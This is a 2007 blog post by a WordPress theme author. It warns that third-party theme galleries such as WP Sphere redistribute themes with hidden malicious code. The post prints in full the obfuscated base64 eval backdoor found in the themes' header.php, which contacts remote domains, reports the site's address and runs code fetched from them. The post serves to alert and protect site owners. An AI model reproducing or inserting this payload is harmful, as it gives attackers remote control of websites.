Do not download WordPress themes distributed by 3rd party sites

  • November 25th, 2007

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download directly from the authors website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributed WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, […]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.

How do you police a non-policed platform?

The growth of a platform increases the virtual bulls-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords to strengthen and increase the likelihood of attracting organic search engine traffic. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere else other than the links below:

If you’ve recommended WordPress to friends and family, please take the time to check or inform them of the dangers of downloading from free theme galleries. [Digg this]